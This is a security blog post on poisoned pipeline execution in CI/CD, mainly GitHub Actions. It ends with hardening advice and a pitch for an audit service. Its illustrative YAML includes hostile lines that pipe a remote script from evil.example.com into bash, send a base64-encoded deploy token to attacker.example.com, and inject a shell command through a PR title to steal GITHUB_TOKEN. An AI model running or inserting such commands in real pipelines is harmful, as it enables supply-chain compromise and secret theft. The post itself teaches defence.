Security · 11 min

Your CI/CD Pipeline Is the Easiest Backdoor Into Production

Pipeline poisoning attacks exploit CI/CD configs to inject malicious code straight into production builds. Most teams never audit their pipeline definitions.

By Security Team · March 13, 2026

A fintech startup shipped malware to 40,000 users in 2024 because someone modified a GitHub Actions workflow file in a pull request. The PR looked normal. Changed two lines of CSS and added a run: curl step that downloaded a cryptominer into the build artifact. Nobody reviewed the workflow diff. The CI passed. It merged.

Took them eleven days to notice.

Why Pipeline Configs Get Zero Scrutiny

Development teams review application code obsessively. They'll argue about variable names for 45 minutes. But .github/workflows/deploy.yml? That file gets the same attention as a README update. Rubber-stamped and merged.

And attackers know this. SolarWinds didn't happen because their C# code was bad. The build system got compromised. Codecov's bash uploader breach in 2021 affected thousands of downstream projects, including Twitch, because teams trusted their CI scripts implicitly. The pipeline IS the attack surface now. Not the code it builds.

A 2023 Aqua Security study found that 82% of organizations had at least one misconfigured CI/CD pipeline with excessive permissions. Not "could theoretically be exploited." Actively misconfigured. Running with admin tokens. Writing to production registries. Accessible from forked repositories.

Poisoned Pipeline Execution: The Three Flavors

Poisoned pipeline execution (PPE) comes in three variants, and most developers only think about the obvious one.

Direct PPE

Someone with write access modifies the pipeline definition directly. Changes the build script. Adds a step. Modifies an existing one to include malicious commands. You'd think this is rare because it requires repo access, but remember: most organizations give write access to way too many people. Contractors. Interns. That developer who left six months ago and whose access was never revoked.

# looks innocent enough in a big workflow file
- name: Setup environment
  run: |
    npm install
    curl -s https://evil.example.com/payload.sh | bash
    npm run build

Buried in a 200-line YAML file, that curl line disappears. Especially when the PR description says "fix: update build dependencies."

Indirect PPE

Nastier. The attacker doesn't touch the pipeline file at all. They modify a file that the pipeline consumes. A Makefile. A package.json postinstall script. A Dockerfile. The pipeline runs unchanged, but the inputs are poisoned.

// package.json - spot the problem
{
  "scripts": {
    "postinstall": "node scripts/setup.js && node scripts/telemetry.js",
    "build": "next build",
    "start": "next start"
  }
}

That telemetry.js file? Added in the same PR. "Added anonymous build telemetry" the description says. The actual content exfiltrates environment variables, which in CI usually include deployment tokens, API keys, and database credentials.
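You can blunt this particular vector by refusing to run lifecycle scripts in CI at all. A sketch (some packages legitimately depend on postinstall hooks and will break, so test before adopting):

# blunt instrument: npm skips preinstall/postinstall entirely
- name: Install dependencies without lifecycle scripts
  run: npm ci --ignore-scripts

It won't stop a poisoned Makefile or Dockerfile, but it removes the single most popular indirect PPE entry point in JavaScript projects.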

Public PPE (fork-based)

Anyone on GitHub can fork your public repo and submit a PR. If your workflow triggers on pull_request and the workflow file itself comes from the PR branch (not the base), an external attacker can run arbitrary code in your CI environment. Without ever having write access to your repo.

# RISKY: the workflow definition comes from the PR branch,
# so a fork can rewrite it (fork runs get no secrets, though)
on:
  pull_request:
    branches: [main]

# SAFER definition: pull_request_target takes the workflow
# from the base branch instead, but it runs with your secrets
on:
  pull_request_target:
    branches: [main]

But even pull_request_target isn't bulletproof. It runs with access to your secrets, so if you check out the PR's code and execute any of it (tests, build scripts, postinstall hooks), you're back to square one. GitHub's own docs warn about this, buried three clicks deep in their security hardening guide.
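The footgun pattern the hardening guide warns about looks roughly like this (job and script names are illustrative):

# the trap: pull_request_target plus checking out attacker code
on:
  pull_request_target:

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          # explicitly checks out the fork's code...
          ref: ${{ github.event.pull_request.head.sha }}
      # ...then runs it, with your secrets in the environment
      - run: npm ci && npm test

The trigger grants secrets, the checkout pulls untrusted code, and the run step executes it. Any one of the three is fine alone. Together they hand the attacker everything.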

Secrets in CI Are Basically Plaintext

Every CI platform masks secrets in logs. Great. Except there are about forty ways to exfiltrate them anyway.

# GitHub Actions "masks" secrets in logs, but...
- name: Totally normal step
  run: |
    # base64 encode to bypass log masking
    echo $DEPLOY_TOKEN | base64 | curl -d @- https://attacker.example.com/collect
  env:
    DEPLOY_TOKEN: ${{ secrets.DEPLOY_TOKEN }}

Log masking is string matching. Encode the secret differently and it sails right through. Or write it to a file and upload it as an artifact. Or use DNS exfiltration. Or just make an HTTP request. The CI runner has network access by default because it needs to pull dependencies and push builds.

CircleCI got breached in January 2023 and told every single customer to rotate all secrets stored in their platform. Every. Single. One. Because the assumption was that all secrets were compromised. That affected over a million developers.

GitHub Actions Specifically Is a Mess

Not picking on GitHub here. Well, maybe a little. But Actions has some footguns that other platforms handle better.

Third-party actions are just someone else's code running with your secrets. When you write uses: some-org/some-action@v3, you're trusting that org completely. Tags are mutable. The v3 tag can point to different code tomorrow. The tj-actions/changed-files incident in March 2025 proved this: a popular action got compromised and started dumping CI secrets to attacker-controlled logs. Thousands of repos affected. Pin to a commit SHA or accept the risk.

# Bad: mutable tag
- uses: actions/checkout@v4

# Better: pinned SHA
- uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.1

# Keeping pinned SHAs fresh: Dependabot and Renovate can bump them automatically

The GITHUB_TOKEN default permissions are too broad. Until recently, the default was read-write access to the repository contents, packages, and more. Now it defaults to read-only for forked repos, but for your own workflows it still has write access. Add permissions: blocks to every workflow or set the org-wide default to read-only.
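A minimal least-privilege setup drops everything at the workflow level, then grants back per job:

# top of the workflow file: no default token permissions at all
permissions: {}

jobs:
  build:
    runs-on: ubuntu-latest
    permissions:
      contents: read  # only what this job actually needs
    steps:
      - uses: actions/checkout@v4

Now a compromised step in this job can read the repo and nothing else: no pushing commits, no publishing packages, no writing releases.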

Expression injection through PR titles, issue titles, and branch names.

# Vulnerable to injection
- name: Comment on PR
  run: |
    echo "Processing: ${{ github.event.pull_request.title }}"

# If PR title is: "; curl https://evil.example.com/steal?t=$GITHUB_TOKEN; echo "
# That runs as a shell command

Use an intermediate environment variable instead. Always. GitHub even has a CodeQL query for this (js/actions/command-injection) but barely anyone runs it on their workflow files.
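The safe version of the step above passes the title as data rather than interpolating it into the script:

# safe: the title lands in an env var, never in shell syntax
- name: Comment on PR
  run: |
    echo "Processing: $PR_TITLE"
  env:
    PR_TITLE: ${{ github.event.pull_request.title }}

The expression is expanded when GitHub builds the job environment, not when the shell parses the script, so a title full of semicolons and backticks is just a string.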

What a Hardened Pipeline Actually Looks Like

The fix isn't one thing. It's layers. Some are easy. Some require changing how your team thinks about CI.

Require workflow approval for external contributors. GitHub has this setting. Turn it on. Every fork PR should require manual approval before any workflow runs. Yes, it's friction. The alternative is running arbitrary code from strangers.

Use OpenID Connect instead of long-lived secrets. AWS, GCP, and Azure all support OIDC tokens from GitHub Actions. Instead of storing an AWS_SECRET_ACCESS_KEY that lives forever, the CI gets a short-lived token scoped to exactly what it needs. If exfiltrated, it expires in minutes.

permissions:
  id-token: write  # needed for OIDC
  contents: read   # minimum needed

jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: aws-actions/configure-aws-credentials@e3dd6a429d7300a6a4c196c26e071d42e0343502
        with:
          role-to-assume: arn:aws:iam::123456789012:role/deploy-role
          aws-region: eu-west-1
          # no static credentials anywhere

Separate build and deploy pipelines. The build pipeline produces an artifact. A completely separate pipeline, triggered by artifact creation (not code push), handles deployment. Different permissions. Different secrets. A compromised build step can't touch production directly.
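On GitHub Actions, one way to wire that up is a workflow_run trigger, so deploy starts only when the build workflow finishes (the workflow name and deploy step here are illustrative):

# deploy.yml - triggered by the build workflow completing, not by push
on:
  workflow_run:
    workflows: ["build"]
    types: [completed]
    branches: [main]

jobs:
  deploy:
    # deploy only if the build actually succeeded
    if: ${{ github.event.workflow_run.conclusion == 'success' }}
    runs-on: ubuntu-latest
    steps:
      - run: echo "fetch the built artifact and deploy it here"

The deploy workflow lives on your default branch, so a PR can't modify it, and its secrets never exist in the build job's environment.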

Sign your artifacts. Sigstore/cosign for containers. GPG for packages. If the build output isn't signed, you can't verify it wasn't tampered with between build and deploy. It takes 30 seconds to add to a pipeline and most teams don't bother.
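A sketch of keyless container signing with cosign 2.x. The image name and the push step it references are hypothetical; it reuses the same id-token: write permission the OIDC example needs:

permissions:
  id-token: write  # cosign signs with the runner's OIDC identity, no key to leak
  packages: write

steps:
  # steps.push is a hypothetical earlier step that pushed the image
  - name: Sign the image by digest
    run: cosign sign --yes ghcr.io/example/app@${{ steps.push.outputs.digest }}

Signing by digest rather than tag matters: tags are mutable, digests aren't, so the signature binds to the exact bytes you built.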

Scanning Pipeline Configs Is Not Optional Anymore

You lint your JavaScript. You type-check your TypeScript. You run SAST on your application code. But your pipeline definitions? Those YAML files that control what runs in privileged environments with access to production secrets?

Nobody scans those.

Tools like Checkov and Semgrep have CI/CD rules now. GitHub's own security features can catch some of this. But the coverage is patchy and most rules focus on the obvious stuff. The subtle poisoning attacks, the indirect PPE through build scripts, the expression injection through user-controlled inputs, that requires understanding how the pipeline actually executes.
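A starting point, assuming Checkov's github_actions framework (the coverage caveats above still apply; it catches misconfigurations, not clever poisoning):

- name: Scan workflow definitions
  run: |
    pip install checkov
    checkov --directory .github/workflows --framework github_actions

Even patchy scanning beats none: unpinned actions, missing permissions blocks, and obvious secret exposure are exactly the low-effort findings these rules catch.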

ScanMyCode.dev runs security audits that cover your CI/CD configuration alongside your application code. Pipeline misconfigurations, overly broad permissions, unpinned actions, secret exposure risks. You get the findings with exact file locations and remediation steps within 24 hours.

Stop Treating Pipeline Code as Infrastructure Boilerplate

Every YAML file in .github/workflows/ is production code. It runs with more privileges than your application. It has access to secrets your app never sees. And it executes automatically on events that external actors can trigger.

Review pipeline changes with the same rigor as application code. More, actually, because the blast radius is bigger. A bug in your app affects users. A compromised pipeline affects your entire software supply chain.

If you haven't audited your CI/CD configs recently, now is a good time. Submit your repo for a security audit and find out what's actually running in your pipelines before someone else does.

ci-cd · pipeline-security · supply-chain · github-actions · devops-security
